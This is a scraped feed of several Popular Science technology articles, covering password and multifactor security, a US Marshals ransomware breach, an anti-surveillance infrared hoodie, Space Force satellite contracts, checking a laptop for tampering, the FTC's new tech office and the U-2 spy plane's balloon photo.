Password managers. That’s it, you think, that’s the solution. Theoretically, it is. These stand-alone apps, downloadable extensions, and built-in browser utilities have three main abilities: suggesting strong passwords, storing them securely, and remembering them whenever you visit a website where you have an account. 

Basically, these tools allow us to outsource the whole credentials problem out of our lives, on the condition that we remember one good master password—or hold another type of authentication key, such as a fingerprint. And it works. Depending on the password manager you get, you’ll find features like good design, syncing across devices, and the ability to choose when fields autofill. 

But password managers are not perfect, and what makes them convenient also makes them incredibly attractive targets for hackers. After all, the proverbial basket that holds all your cybersecurity eggs is a great deal: Creeps can crack one account and take all your credentials for free. Companies like NordPass, KeyPass, 1Password, and others have taken extra precautions to secure their apps, incorporating features like constant logouts and unique single-use codes in case you lose access to your account. 

[Related: How to get started using a password manager]

Still, sometimes these measures are not enough. In December 2022, LastPass, another popular password manager, reported a security breach that included users’ names, phone numbers, emails, and billing information. As if this weren’t concerning enough, the company’s crisis management at the time was lacking, and it only disclosed details about the breach and what steps should customers follow in a blog post published more than two months later

Beyond breaches, some features in password managers are generally less than secure. In a 2020 review, researchers from the User Lab at the University of Tennessee, Knoxville, mentioned autofill as one of the most concerning. This is especially true when password managers automatically enter credentials without any input from the user. In cross-site scripting (XSS) attacks, hackers inject malicious scripts into a website’s code to steal a password as soon as the right fields are populated. “If a password manager autofills passwords without first prompting the user, then the user’s password will be surreptitiously stolen simply by visiting the compromised website,” explain study authors Sean Oesch and Scott Ruoti.

The likelihood of a successful XSS attack varies depending on factors like whether the site is using a secure connection (HTTPS, for example). But it’s always best to opt for a password manager that either requires user interaction for autofill or allows you to manually disable the feature. Most browser-based password managers don’t require user interaction before filling in credentials, but there are some exceptions. Mozilla Firefox automatically populates fields by default, but you can turn this feature off by clicking the main menu (three lines), going to Settings, Privacy & Security, and scrolling down to Logins and Passwords. Once you’re there, uncheck the box next to Autofill logins and passwords. An even easier solution is to use Apple’s Safari, which always requires user input for autofill. If you’re on a PC or don’t want to switch browsers, the study found the browser extension of the popular 1Password app will also require a click before it reveals your information. 

Drink water, wear sunscreen, and enable multifactor authentication

Healthy habits lead to better lives, and when it comes to your life online, using multifactor authentication is truly self-care. 

This now practically ubiquitous feature is an extra layer of security that prevents virtual sneaks from accessing your accounts even when they have the right credentials. This means that even if your passwords leak all over the internet, people won’t be able to use them if they don’t have an extra form of verification like a text sent directly to your phone, an app-generated code, a prompt on another device, or a biometric element such as your fingerprint or face. 

Which and how many of these you use will depend on the level of security you want your account to have and what is most practical for you. Keep in mind that the more methods you enable, the more ways there will be to access your account. That’s not exceptionally secure, but it might make sense if you, say, regularly lose your phone or get locked out of your accounts. 

[Related: How to keep using two-factor authentication on Twitter for free]

Just know that even though most modern platforms offer some kind of multifactor authentication, you won’t find every type every time. The most common option is authentication via a code sent over SMS text, followed closely by authentication via a code-generating apps. These are essentially the same, but the latter method uses the internet instead of phone networks to deliver the code. It’s worth noting that text messages traveling through the electromagnetic spectrum can be intercepted, and according to Ruoti, the low standards US telecom companies use when authenticating users make it possible to port someone’s phone number to a SIM card and receive their authentication codes on your device. If this concerns you, you can opt for more sophisticated alternatives, like security keys. These work exactly like your home keys—just plug them into your gadget’s USB port when prompted, and you’re done. We have an entire guide solely dedicated to helping you choose the best multifactor authentication method for you, if you want to do a deep dive into your options.

But even if some approaches are better than others, one thing will always be true: Any multifactor authentication is better than none at all. So if you have a phone, it’s an excellent idea to set up SMS codes for whenever a new device tries to access your account. Just make sure to disable the ability to preview message content on your lock screen, or somebody could use your codes by just stealing your phone. On Android, you can do this by going to Settings, Notifications, and turning off Sensitive notifications under Privacy. On iOS, open Settings, go to Notifications, tap Show Previews, and choose Never. If you want to see previews for less sensitive notifications on your iPhone, you can turn off previews for individual apps instead. If you receive codes via the Messages app, for example, open Settings, go to Notifications, tap Messages, find Show Previews, and choose Never.  

May this be the sign you were waiting for to get your act together when it comes to online security. Don’t wait until spring cleaning; don’t wait until it’s time to make New Year’s resolutions—do it now. Keep your credentials off 2023’s list of worst passwords. That’s a list you don’t want to make. 

Now off you go to change those passwords. We’re glad we had this talk. 

The post The Opt-Out: Stop choosing bad passwords already appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Why government agencies keep getting hacked https://www.popsci.com/technology/us-government-agencies-hacking-history/ Wed, 01 Mar 2023 20:00:00 +0000 https://www.popsci.com/?p=516121
Cyber security concept, man hand protection network with lock icon and virtual screen on smartphone.
Cybersecurity appears to be an ongoing issue for government agencies. DEPOSIT PHOTOS

The most recent incident involves a division of the Justice Department.

The post Why government agencies keep getting hacked appeared first on Popular Science.

]]>
Cyber security concept, man hand protection network with lock icon and virtual screen on smartphone.
Cybersecurity appears to be an ongoing issue for government agencies. DEPOSIT PHOTOS

The US Marshals Service, a division of the Justice Department, was hacked last month. According to the New York Times, the hackers stole “a trove of personal information about investigative targets and agency employees.” It’s not a good look for the department tasked with protecting judges, transporting federal prisoners, and managing witness protection. (Fortunately, the latter database wasn’t stolen in the hack.)

According to Justice Department officials, the breach happened on February 17 and was done using ransomware. This information is a bit vague from a security perspective, but suggests that a ransomware tool was used to steal data from the US Marshals’ computer system in order to extort a payout in return for not releasing the information. This is different from another kind of common ransomware attack where the target’s computer is encrypted so they can’t use it, or a straight up hack where the bad actor just steals whatever they can in order to sell it or use it for international espionage. It’s unclear as of yet if the Justice Department intends to pay the hackers off, or if the stolen data—including “sensitive law enforcement information”—has been leaked on the dark web. 

The Marshals are far from the first US government organization to suffer a security breach. Last year, at least six state governments were targeted by Chinese hackers. In 2020, a Russian intelligence agency hacked the State Department, the Department of Homeland Security, parts of the Pentagon, and dozens more federal agencies exploiting a vulnerability in a software package called SolarWinds. And local governments are frequently targeted too. Last month, the City of Oakland had to declare a state of emergency after a ransomware attack forced it to take all its IT systems offline. The Center for Strategic and International Studies keeps a list of significant cyber incidents, and there are major attacks on government agencies around the world basically every month. 

[Related: Cybersecurity experts say $2 billion is too little, too late]

It’s an issue that the government is aware of, and claims to be actively working to fix. In 2021, a federal cybersecurity evaluation found that almost all of the agencies reviewed did not meet the standards for keeping the data they store safe. Aging computer systems and outdated codes are problems that come up over and over again. Since then, there has reportedly been efforts made to reorganize cybersecurity infrastructure, develop guidelines, and implement best practices.

So what makes government agencies such tempting targets to hackers? Well, let’s leave aside the espionage angle, where adversarial governments attempt to steal state secrets, shut down nuclear programs, and generally just go all John le Carré. Their motivations are fairly self-explanatory. For hackers looking to make a quick buck there are a number of reasons government agencies can be a lucrative option. 

According to a report by Sophos, local governments are often targeted because they have weak defenses, low IT budgets, and limited IT staff. In other words, they’re often overstretched compared to the private sector and so the hackers are likely to have an easier time installing ransomware. For larger government departments, presumably including the US Marshals, the appeal is their access to public funds. It makes them seem a lucrative target, whether or not the hackers are able to actually extract a payment

Cybersecurity has been a priority for the Biden administration, but it’s clear that there is still a long way to go before ransomware attacks like these are no longer an issue for government organizations. The reality is that a single weak link, phishing attack, or vulnerable computer can offer hackers a way in—and keeping ahead of them is a nearly impossible task.

The post Why government agencies keep getting hacked appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A simple DIY hoodie can fool security cameras https://www.popsci.com/technology/camera-shy-hoodie-privacy/ Mon, 27 Feb 2023 18:00:00 +0000 https://www.popsci.com/?p=515573
Side-by-side of man wearing black hoodie and surveillance camera footage of him walking with LED lights blinding face
Mac Pierce's 'Camera Shy Hoodie' uses infrared LEDs so obscure wearers faces in security cameras. Mac Pierce/Creative Commons

The 'Camera Shy Hoodie' looks innocuous, but keeps your face invisible to surveillance.

The post A simple DIY hoodie can fool security cameras appeared first on Popular Science.

]]>
Side-by-side of man wearing black hoodie and surveillance camera footage of him walking with LED lights blinding face
Mac Pierce's 'Camera Shy Hoodie' uses infrared LEDs so obscure wearers faces in security cameras. Mac Pierce/Creative Commons

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

Despite objections from privacy advocates and many everyday citizens, surveillance technology such as facial recognition AI is appearing more and more in modern life. The market is booming—by 2026, the surveillance tech market will reach over $200 billion, despite being less than half that size in 2020. New products designed to collect personal data and track physical movements will likely keep popping up until meaningful legislation or public pushback causes companies to slow their roll. And that’s where people like Mac Pierce enter the picture. 

Pierce, an artist whose work critically engages with weaponized emerging technologies, recently unveiled their latest ingenious project—an everyday hoodie retrofitted to include an array of infrared (IR) LEDs that, when activated, blinds any nearby night vision security cameras. Using mostly off-the-shelf components like LumiLED lights, an Adafruit microcontroller, and silicone wire, as well as we software Pierce that made open-source for interested DIYers, the privacy-boosting “Camera Shy Hoodie” is designed to enable citizens to safely engage in civic protests and demonstrations. Or, wearers can just simply opt-out of being tracked by unknown third-parties while walking down the street.

[Related: Police are paying for AI to analyze body cam audio for ‘professionalism’.]

Although unnoticeable to human eyes, the garment’s infrared additions wreak havoc on surveillance cameras that utilize the light spectrum to see in evening darkness. Emitting the flashing infrared bursts from the hoodie will force nearby cameras’ auto exposure to try correcting for the brightness, thus obscuring a wearers’ face in a bright, pulsating light.

Speaking with Motherboard on Monday, Pierce argued, “surveillance technology has gotten to such a point where it’s so powerful and so pervasive. And it’s only now that we’re realizing, ‘Maybe we don’t want this stuff to be as powerful as it is.’” Projects like the Camera Shy Hoodie—alongside Piece’s earlier, simplified “Opt Out Cap”—are meant to simultaneously bring attention to the issues of privacy and authority, while also providing creative workarounds to everyday, frequently problematic surveillance tools, he says.

[Related: The DOJ is investigating an AI tool that could be hurting families in Pennsylvania.]

Pierce has made all the designs, plans, and specifications for their hoodie hack available for free on their website. Unfortunately, the project isn’t cheap—all told, the work would set makers back around $200—but anyone interested in a Camera Shy Hoodie to call their own can also sign up to be notified by Pierce when custom kits are available for purchase.

Meanwhile, there are a number of interesting (and cheaper) clothing options in the vein of Piece’s Camera Shy Hoodie, including an apparel line meant to confuse license plate scanning traffic cameras, and facial recognition-obscuring makeup techniques.

The post A simple DIY hoodie can fool security cameras appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Why the Space Force is testing out tech for small, high-flying satellites https://www.popsci.com/technology/space-force-astranis-satellites/ Mon, 27 Feb 2023 12:00:00 +0000 https://www.popsci.com/?p=515386
An Astranis satellite.
An Astranis satellite. Astranis

A recent contract is worth more than $10 million and involves a secure communications technique.

The post Why the Space Force is testing out tech for small, high-flying satellites appeared first on Popular Science.

]]>
An Astranis satellite.
An Astranis satellite. Astranis

On February 14, geostationary communications satellite company Astranis announced that it had been awarded a contract with the US Space Force worth over $10 million. The contract is to first demonstrate a secure comms technique on the satellite hardware in a terrestrial test setting, and also includes the possibility of testing it in space

Space remains a useful place for countries to place sensors that look down on other nations. Many of these satellites reside in low Earth orbit, or about 1,200 miles above the surface, which is easier for satellites to reach and lets satellites circle the globe rapidly. Geostationary orbit, which is 22,200 miles above ground, is harder to get to. Plus, satellites at all altitudes risk having signals jammed, or being disrupted by other objects in orbit, which has led the US military to pursue satellite constellations, or formations of smaller satellites, as a way to ensure that some functionality persists in the event of attack or disaster. 

“We build small satellites for higher orbits, starting with geostationary orbit, which is quite a higher orbit,” says Astranis co-founder and CEO John Gedmark. “It’s the special orbit where you can park a single satellite over a part of the world or over a country and provide continuous service with just that one satellite.”

Over Alaska and Peru

Geostationary satellites have been used to provide communications and television broadcasts, and Astranis’ primary aim for both commercial and military customers is to use smaller geostationary satellites to provide continuous broadband-level internet connections. For two demonstrations of commercial uses, Gedmark points to upcoming launches placing satellites above Alaska (scheduled for early April), and one later this year that will put a satellite above Peru.

“This is a satellite that’ll go up over Peru and also provide some coverage in Ecuador. We will basically allow them to go and deploy and upgrade a number of cell towers out in some of the most remote parts of the country,” said Gedmark. “There’s a lot of parts of Peru where the terrain is just super rough and pretty extreme in the jungles, they have Andes mountains, they have a lot of things that make it very hard to get connectivity out to some of these remote areas.”

In both these places, the satellites will augment existing telecommunications infrastructure on the ground, letting remote towers connect through space instead of over land. Peru, like Alaska, contains vast stretches of varying terrain, where infrastructure such as wires, cables, or fiber internet connections can be hard to place. Freestanding cell phone towers can be set up, powered locally, and then route their communications through satellites instead of over-land wires, bringing 3G and 4G levels of internet to places people could not previously access it.

For military use

Those same traits, for connecting local rural infrastructure to wider data networks through space, are part of what makes Astranis satellites so appealing to the military.

“We realized that the military has this real problem right now for milsatcom and for some other capabilities around resiliency, right? They are really dependent on a small handful of these giant geo satellites, some of which cost billions of dollars. And those satellites are, as we like to quote General Hyten on this, big fat and juicy targets,” said Gedmark.

In 2017, Air Force General John Hyten was the head of US Strategic Command, and announced that he would no longer “support the development any further of large, big, fat, juicy targets,” referring to those types of satellites. Hyten retired in 2021, but the Department of Defense has continued to push for smaller satellites to fill the skies, as a more resilient option than all-in-one massive satellites of the present. Many of these constellations are aimed at low earth orbit.

“Without getting into specific pricing, we could put up about a dozen or more of our satellites for the cost of one of the big ones,” says Gedmark. Since 2018, Astranis has attracted venture funding on its premise to put satellites into geostationary orbit

“It’s hard to design all the electronics for the harsh radiation environment of geo, you’re right in the thick of the Van Allen belts,” says Gedmark. The Van Allen belts contain charged particles that can damage satellites, so anything built to survive has to endure the heavy ion strikes and radiation dosages inherent to the region. “These higher orbits are harder to get to, so you have to solve that with some clever onboard propulsion strategies. We solve that by having an electric propulsion system, and having an ion thruster on board.”

When launched, the satellites are aimed towards geostationary orbit, and then use their own power to reach and maneuver in space. Gedmark says the satellites are designed to stay in geostationary orbit for between 8 and 10 years, with the ability to relocate up to 30 times in that period.

The speed at which the satellites can be maneuvered from one orbit to another depends on how much fuel the satellite operators are willing to expend, with repositioning possible in days, though Gedmark expects moving to a new location in weeks will be the more typical use case. 

Once in orbit, the satellites need to communicate securely. The Protected Tactical Waveform is a communications protocol and technique developed by the US military, which Astranis aims to demonstrate can be run on the software-defined radio of its satellites. (A software-defined radio  is a computer that can change its parameters for transmitting and receiving information with code, while a more traditional radio requires analog hardware, like modulators and amplifiers, to encode and decode information from radio signals.) 

The Protected Tactical Waveform is “a set of techniques that are programmed into the radio so it can automatically avoid jamming and interference,” says Gedmark. “We’re gonna start by doing that as a demo in our lab, and then with the future satellites do that as an on orbit demo.”

Because this protocol will run on software radio, rather than hardware that is fixed on form once launched, it likely means that should the need arise, Astranis could adapt existing commercial satellites to carry the Protected Tactical Waveform, while it remains in orbit, facilitating the surge communications as events arise and to meet military need.

For now, the promise is that private investment in communication tech can yield a tool useful both for expanding internet connectivity across the globe, and for providing communications to US military forces in the field faster than it would take to set up ground-based infrastructure. For the Space Force, which is tasked with ensuring reliable communications across the heavens, more durable satellites that can be maneuvered as needed would allow it to redeploy assets across the skies to win wars on Earth.  

The post Why the Space Force is testing out tech for small, high-flying satellites appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
How to check if your computer has been tampered with https://www.popsci.com/computer-tampering-security-guide/ Sun, 12 Dec 2021 17:40:29 +0000 https://www.popsci.com/uncategorized/computer-tampering-security-guide/
A man wearing sunglasses and a blue plaid shirt sitting in a dark room using an Apple Macbook laptop.
Everyone knows sunglasses are much more practical than a full Guy Fawkes mask when you're hacking. NeONBRAND / Unsplash

There are some easy ways to tell if someone has been using your computer.

The post How to check if your computer has been tampered with appeared first on Popular Science.

]]>
A man wearing sunglasses and a blue plaid shirt sitting in a dark room using an Apple Macbook laptop.
Everyone knows sunglasses are much more practical than a full Guy Fawkes mask when you're hacking. NeONBRAND / Unsplash

Whether you’re in an open office where colleagues regularly wander past, or live somewhere—like a college dorm—where you feel comfortable leaving your laptop unattended in the presence of relative strangers, it can be all too easy for someone else to sneak a look at your computer.

If you want to keep your device secure in communal environments, your best bet is to stop unauthorized access in the first place. Still, there’s some detective work you can do if you suspect someone else has been using your device.

Always make sure you lock your computer

Since prevention is better than a cure, you ideally want to prevent others from accessing your laptop in the first place. A simple way to do that is to lock your laptop behind a password whenever you step away from it.

On macOS, you can get back to the lock screen at any point by opening the Apple menu and choosing Lock Screen, or hitting the keyboard shortcut Ctrl+Cmd+Q. It’s straightforward on Windows, too. From the Start menu, click your avatar, then choose Lock. Alternatively, the Win+L keyboard shortcut works as well.

[Related: How to remove Bing results from your Window Start menu]

If you keep leaving your desk in a hurry or just always forget to lock your computer when you step away from it, set your laptop to lock itself after a certain amount of idle time. On macOS, open the Apple menu and pick System Settings, then scroll down to Lock Screen. Find the option to Require password after screen saver begins or display is turned off, and use the dropdown menu to choose exactly when your computer will lock itself after it’s been idle. You can use the options and dropdown menus right above this to change the time it takes for a screen saver to appear or the display to turn off.

To automatically lock Windows 11, click the Start menu, then the cog icon to open your settings. Then go to Accounts > Sign-in options and find the Additional settings heading. Click the dropdown menu next to If you’ve been away, when should Windows require you to sign in again? and choose When PC wakes up from sleep. To set when your computer should start snoozing, choose System from settings, then Power & battery, and click Screen and sleep to adjust the various options to your liking.

On Windows 10, open the Start menu and hit the cog icon to access your settings. From there, go to Accounts > Sign-in options and make sure the Require sign-in option is set to When PC wakes up from sleep. To set idle time duration, go to your settings and pick System, followed by Power & sleep.

The duration of your PC’s various sleep and idle options is up to you—a shorter time is better for security and battery life, but also means your computer might lock itself while you’re still in front of it if you haven’t touched the keyboard or mouse for a few minutes. Start with something around five minutes, and adjust it if you feel that time is too short.

Check for recent activity

Let’s say you suspect someone might have been able to access your laptop while it was unlocked, or maybe even knows your password. Your next step should be to check for telltale signs of unusual activity inside the most commonly used apps.

Start with your web browser and call up the browsing history to see if someone else has left a trace. From the Chrome menu (three vertical dots in the top right corner of your browser), go to History, then History again; from the Firefox menu (three lines), choose History, then Manage history; from the Microsoft Edge menu (three dots), choose History, then either All to view recent pages in a dropdown menu or the three dots in the top right of that menu followed by Open history page; and from the Safari toolbar on macOS, choose History, then Show All History.

Most programs on your computer have some kind of history or recent files list. In Microsoft Word, for example, click File, Open, then Recent. In Adobe Photoshop, you can choose File and Open Recent. Whatever the applications on your system, you should be able to find similar options.

If you’re not sure what program a would-be laptop infiltrator might have used, check the file system—your intruder might have left something behind on the desktop or in your computer’s download folder, but you can dig deeper, too. On macOS, open Finder from the dock, then switch to the Recents tab to see all the files that have been edited lately. There’s a similar screen on Windows too, accessible by opening File Explorer and clicking Quick Access (this may appear by default).

Finder window on macOS showing recent image files.
Finder can show you all the files that have been worked on recently in macOS—a good way to check if your computer has been tampered with. David Nield

If you’re still using Windows 10, you’ve got another screen you can check: the timeline. Click the Task View icon on the taskbar, which looks like two stacked rectangles with a scroll bar to their right. If you don’t see it, right-click your taskbar and choose Show Task View button. Scroll down your timeline to find any files that have been opened, websites that have been viewed, and Cortana commands that have been run. The Task View still exists on Windows 11, but it functions differently, and there’s no timeline.

You can dig into absolutely everything that’s happened on your laptop or desktop recently, but the utilities involved are quite difficult to decipher. You might have to run a few web searches to make sense of the information they provide. The utilities will also log all system actions, including those taken by the computer itself. Just because you see activity at a time you weren’t around doesn’t mean someone tampered with your device—it could have run a task itself.

[Related: Set your computer to turn on and off on a schedule]

On macOS, you can do so with the Console—find it by opening Spotlight (Cmd+Space) then typing “console” into the box. If you don’t see anything, you’ll have to click Start streaming to begin viewing system log messages, but this may slow down your computer. These logs will give you a comprehensive list of everything happening on your computer, and you can narrow down the entries via the Search box. Type “wake up” into the box to see all the times your Mac has woken up from sleep, for example.

Over on Windows, you have Event Viewer—look for it in the taskbar search box. Again, it’ll provide you with a mass of information, presented in mostly technical language. Click the right-pointing arrow next to Windows Logs to view a number of subcategories, select System and then right-click System. Choose Filter Current Log, find the Event sources dropdown menu, select Power-Troubleshooter and click OK. This should present you with a list of all the times your laptop woke up.

Get some extra help from apps

Realtime Spy app window
Spytech Realtime-Spy will keep an eye on your laptop in your absence. David Nield

If you’re serious about catching laptop snoopers in the act, some third-party software might be in order. One of the best we’ve come across is Spytech Realtime-Spy, which works for Windows or macOS through a simple web interface. You can test out a demo version online, too.

The program shows you the apps that have been used, the websites that have been visited, and the connections that have been made on your computer. It will even take screenshots and record individual key presses. It’s a comprehensive package but will set you back $80 per year.

Another option is Refog, which concentrates mainly on logging keystrokes on your laptop’s keyboard, but which also monitors web usage and takes screenshots. The software costs about $30 per month for Windows or macOS, but there’s a free trial if you want to test it first.

While these programs can alert you to potential snoopers, they can also be used to spy on other people. Of course, we’d strongly advise against doing this. Otherwise, you’re the creep.

This story has been updated. It was originally published on July 20, 2019.

The post How to check if your computer has been tampered with appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
The FTC is trying to get more tech-savvy https://www.popsci.com/technology/ftc-office-of-technology/ Sat, 25 Feb 2023 12:00:00 +0000 https://www.popsci.com/?p=515353
the FTC
The Federal Trade Commission. PAUL J. RICHARDS/AFP via Getty Images

The agency is beefing up its tech team and forming an Office of Technology. Here's what the new department will do.

The post The FTC is trying to get more tech-savvy appeared first on Popular Science.

]]>
the FTC
The Federal Trade Commission. PAUL J. RICHARDS/AFP via Getty Images

The Federal Trade Commission, or FTC, is bulking up its internal tech team. The agency, which focuses on consumer protection and antitrust issues in the US, announced last week that it would be forming an Office of Technology and hiring more tech experts. 

Leading the new office is Stephanie Nguyen, the agency’s existing chief technology officer, who recently spoke with PopSci about what the new department will do and what her priorities for it are. 

“In general, the FTC has always stayed on the cutting edge of emerging technology to enforce the law,” she says. “In the 1930s, we looked at deceptive radio ads.” Earlier this century, she notes, they focused on “high-tech spyware.” The goal of the agency in general involves tackling problems that plague the public, like the scourge of robocalls.

“The shift in the pace and volume of evolving tech changes means that we can’t rely on a case-by-case approach,” she adds. “We need to staff up.” And the staffing up comes at a time when the tech landscape is as complex and formidable as it’s ever been, with the rise of controversial tools like generative AI and chatbots, and companies such as Amazon—which just scooped up One Medical, a primary care company, and in 2017 purchased Whole Foods—becoming more and more powerful. 

A relatively recent example of a tech issue the FTC has tackled comes from Twitter, which was hit with a $150 million fine in 2022 for abusing the phone numbers and email addresses it had collected for security purposes because it had permitted “advertisers to use this data to target specific users,” as the FTC noted last year. The Commission has also taken on GoodRx for the way it handled and shared people’s medical data. They have an ongoing lawsuit against Facebook-owner Meta for “anticompetitive conduct.” Meanwhile, in a different case, the FTC was unsuccessful at attempting to block Meta’s acquisition of a VR company called Within Unlimited, which CNBC referred to as “a significant defeat” for the FTC. 

[Related: Why the new FTC chair is causing such a stir]

Nguyen says that as the lines become increasingly blurry between what is, and isn’t, a tech company, the creation of the office became necessary. “Tech cannot be viewed in a silo,” she says. “It cuts across sectors and industries and business models, and that is why the Office of Technology will be a key nexus point for our consumer protection and competition work to enable us to create and scale the best practices.” 

The move at the FTC comes at a time when the tech literacy of various government players is in the spotlight and is crucially important. The Supreme Court has been considering two cases that relate to a law known as Section 230, and Justice Elana Kagan even referred to herself and her fellow justices as “not the nine greatest experts on the internet.” 

At the FTC, what having the new Office of Technology will mean in practice is that the amount of what she refers to as in-house “technologists” will roughly double, as they hire about 12 new people. She says that as they create the team, “we need security and software engineers, data scientists and AI experts, human-computer interaction designers and researchers,” and well as “folks who are experts on ad tech or augmented and virtual reality.”

Tejas Narechania, the faculty director for the Berkeley Center for Law & Technology, says that the FTC’s creation of this new office represents a positive step. “I think it’s a really good development,” he says. “It reflects a growing institutional capacity within the executive branch and within our agencies.” 

“The FTC has been operating in this space for a while,” he adds. “It has done quite a bit with data privacy, and it has sometimes been criticized for not really fully understanding the technology, or the development of the technology, that has undergirded some of the industries that it is charged with overseeing and regulating.” (The agency has faced other challenges too.)

One of the ways the people working for the new office will be able to help internally at the FTC, Nguyen says, is to function as in-house subject matter experts and conduct new research. She says they’ll tackle issues like “shifts in digital advertising, to help the FTC understand implications of privacy, competition, and consumer protection, or dissecting claims made about AI-powered products and assessing whether it’s snake oil.” 

Having in-house expertise will help them approach tech questions more independently, Narechania speculates. The FTC will “be able to bring its own knowledge to bear on these questions, rather than relying on the very entities it’s supposed to be scrutinizing for information,” he reflects. “To have that independent capacity for evaluation is really important.” 

For Nguyen, she says the big-picture goal of the new office is that they are “here to strengthen the agency’s ability to be knowledgeable and take action on tech changes that impact the public.”

The post The FTC is trying to get more tech-savvy appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
The real star of this aerial selfie isn’t the balloon—it’s the U-2 spy plane https://www.popsci.com/technology/u-2-spy-plane-balloon-selfie/ Thu, 23 Feb 2023 22:54:19 +0000 https://www.popsci.com/?p=515036
U-2 spy plane balloon selfie
The DOD has captioned this photo: "A U.S. Air Force pilot looked down at the suspected Chinese surveillance balloon as it hovered over the Central Continental United States February 3, 2023.". Photo courtesy of the Department of Defense

Let's take a close look at the U-2, a high-flying spy plane whose pilot wears a space suit.

The post The real star of this aerial selfie isn’t the balloon—it’s the U-2 spy plane appeared first on Popular Science.

]]>
U-2 spy plane balloon selfie
The DOD has captioned this photo: "A U.S. Air Force pilot looked down at the suspected Chinese surveillance balloon as it hovered over the Central Continental United States February 3, 2023.". Photo courtesy of the Department of Defense

A striking photo released on February 22 by the Department of Defense reveals a unique aerial scene: The image shows the Chinese surveillance balloon as seen from the cockpit of a U-2 spy plane on February 3, along with the pilot’s helmet, the aircraft’s wing, and even the shadow of the plane itself on the balloon. 

While the subject of the photo is the balloon, which was later shot down by an F-22, the aircraft that made the image possible is referenced in the image’s simple title: “U-2 Pilot over Central Continental United States.” Here’s a brief primer on that aircraft, a high-flying spy plane with a reputation for being tough to operate and land.  

The U-2 aircraft is designed to operate at “over 70,000 feet,” according to an Air Force fact sheet. That very high altitude means that it flies way higher than commercial jet aircraft, which tend to cruise at a maximum altitude in the lower end of the 40,000-foot range. 

The U-2’s ability to climb above 70,000 feet in altitude “makes it, I believe, the highest flying aircraft that we know about in the Air Force inventory,” says Todd Harrison, a defense analyst with Metrea, a firm formerly known as Meta Aerospace. “That becomes important for a mission like this, where the balloon was operating around 60,000 feet.”

[Related: Why the US might be finding more unidentified flying objects]

The plane features wings that stretch to a width of 105 feet, which is about three times longer than the wingspan of an F-16. “It is designed for very high altitude flight, and it has a very efficient wing—[a] very high aspect ratio wing, so that makes it very long and slender,” Harrison says. Long, slender wings are indeed more efficient than shorter, stubbier ones, which is one of the reasons NASA and Boeing are planning to have truss-supported skinny wings on an experimental commercial aircraft called the Sustainable Flight Demonstrator that would be more fuel efficient than existing models. 

On the U-2, those long wings, which are an asset in the sky, make for a real challenge when trying to get it back down on the ground. “This jet does not want to be on the ground, and that’s a real problem when it comes to landing it,” Matt Nauman, a U-2 pilot, said at an Air Force event in 2019 that Popular Science attended. To land it, “we’ll actually slow down, and that nose will continue to come up until the plane essentially falls out of the sky,” at just about two feet off the ground.  

[Related: Biden says flying objects likely not ‘related to China’s spy balloon program’]

A few other aspects figure into the landing. One is that the aircraft has what’s known as bicycle-style landing gear, as opposed to the tricycle-style landing gear of a regular commercial plane. In other words: It has just two landing gear legs, not three, so is tippy, side-to-side, as it touches down. To help with those landings, a chase car literally follows the plane down the runway as it’s coming in to land, with its driver—a U-2 pilot as well—in radio contact with the pilot in the plane to help them get the bird on the tarmac. This video shows that process. 

U-2 pilot helmet
A U-2 pilot gets a screw tightened on his helmet in the UAE in 2019. US Air Force / Gracie I. Lee

Because the plane is designed to fly at such high altitudes, the pilot dons a heavy space suit like this daredevil wore in 2012, while the cockpit is pressured to an altitude of about 14,000 or 15,000 feet. Having that gear on makes landing the plane even more challenging, as another U-2 pilot said in 2019, reflecting: “You’re effectively wearing a fishbowl on your head.” But having the suit means the pilot is protected from the thin atmosphere if the plane were to have a problem or the pilot had to eject.  

[Related: Everything you could ever want to know about flying the U-2 spy plane]

The point of the aircraft is to gather information. “It is used to spy, and collect intelligence on others,” says Harrison. “It has been upgraded and modernized over the years, with airframe modernization, obviously the sensors have gotten better and better.” The U-2 famously used to shoot photographs using old-school wet film with what’s called the Optical Bar Camera, and stopped doing so only in the summer of 2022. 

A U-2 in Nevada in 2018.
A U-2 in Nevada in 2018. US Air Force / Bailee A. Darbasie

As for the recent photo of the surveillance balloon from the U-2, a reporter for NPR speculates that it was taken specifically “just south of Bellflower” Missouri, as did a Twitter user with the handle @obretix

“It’s a pretty incredible photo,” Harrison reflects. “It does show that the US was actively surveilling this balloon up close throughout its transit of the United States. It’s interesting that the U-2 pilot was actually able to capture a selfie like that while flying at that altitude.”


On February 6, a Popular Science sibling website, the War Zone, reported that the US had employed U-2 aircraft to keep tabs on the balloon. And on February 8, CNN reported before this photo’s official release that a “pilot took a selfie in the cockpit that shows both the pilot and the surveillance balloon itself,” citing US officials.

The post The real star of this aerial selfie isn’t the balloon—it’s the U-2 spy plane appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A new smartphone chip could keep your cell signal alive in crowded places https://www.popsci.com/technology/smartphone-chip-interferences/ Thu, 23 Feb 2023 16:00:00 +0000 https://www.popsci.com/?p=513939
Two gloved hands opening a smartphone on a workbench
A new design could ease headaches caused by slow smartphones in crowded areas. Deposit Photos

Slow phones in a crowded zone could hopefully soon be a thing of the past.

The post A new smartphone chip could keep your cell signal alive in crowded places appeared first on Popular Science.

]]>
Two gloved hands opening a smartphone on a workbench
A new design could ease headaches caused by slow smartphones in crowded areas. Deposit Photos

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

You’re not imagining things—your phone often doesn’t work as well when stuck in a large crowd. More people means more competing signals and data requests, meaning phones eventually fail to connect with their networks and thus create a backlog of demand. This, in turns, slows down everyone’s speeds while also frequently draining device batteries faster than usual.

However, the days of grimacing at your phone while at a concert or basketball game may soon be behind you, however, thanks to a new development from a research team at MIT.

“Imagine you’re at a party with loud music and you want to listen to your own music using headphones. But the outside noise is so loud that you can’t hear your own music unless you turn on the noise cancellation feature, ” posits Soroush Araei, an MIT graduate student in Electrical Engineering and Computer Science and lead author of the project’s paper showcased this week at the International Solid-States Circuits Conference

[Related: What happens after the 3G network dies?]

